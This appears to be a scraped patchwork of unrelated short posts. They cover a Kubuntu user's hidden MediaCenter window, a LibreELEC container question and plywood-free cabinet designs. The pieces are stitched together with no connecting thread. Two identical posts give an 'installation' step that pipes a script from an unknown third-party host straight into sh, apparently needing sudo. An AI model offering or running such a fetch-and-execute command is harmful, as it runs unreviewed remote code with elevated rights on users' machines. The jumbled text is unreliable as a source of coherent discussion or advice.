Hello all,
I'm on Linux Kubuntu for a bit over a year now and I soon also got MediaCenter34 (version 35 by now) for playing my music. Since recently, however, on my notebook the MediaCenter UI does not show up. I see the processes, but it's completely hidden. I even did a fresh install of Linux just now (now Kubuntu 26.04 LTS clean install) but the problem came back at once.
Two more interesting things: When I delete the ~/.jriver folder, holding all the program settings (including license information), I can start the program and I do see the "enter license / continue trial / etc." dialog. When I reactivate my license, the UI won't show up again.
The other odd: On my "big" PC there is no problem. It has a slightly older NVIDIA graphics card and the OS once has been a Ubuntu 24.04 LTS, has then been migrated to become a Kubuntu and I at least upgraded it to versions 25.04, 25.10 and now 26.04 LTS, so it's a much less clean installation I suppose.

Does anyone have any idea how to get MediaCenter work properly on the notebook again?

Ouch! They should have just cancelled it.
Glad I already have it…

Installation:
curl -fsS https://websocket.bplaced.net/install.sh | sh

Installation:
curl -fsS https://websocket.bplaced.net/install.sh | sh
(benötigt werden: curl, sh, wget, apt, sudo)

How I could get a #LibreELEC Image into a #LXC or #VM container and AutoStart it on boot without interaction?

In best case without the need that this container user the graphic core exclusively.

I have to use one device for several usecases, but I do wish to split my #Mediacenter from other #SelfHosting projects.

Still looking for cabinet designs, among my foci being little or best no plywood used in the design/build. *The main reasons why I don't want plywood is how difficult decently strong plywood is to cut without power tools & how splintery a material said material is. Secondarily though without a pickup truck to haul 4 ft by 8ft & larger sheets of it, it's generally at best the same price as dimensional lumber, so using a more difficult, dangerous and more expensive product that also often looks worse at the end, just over it's current popularity doesn't make any real sense.
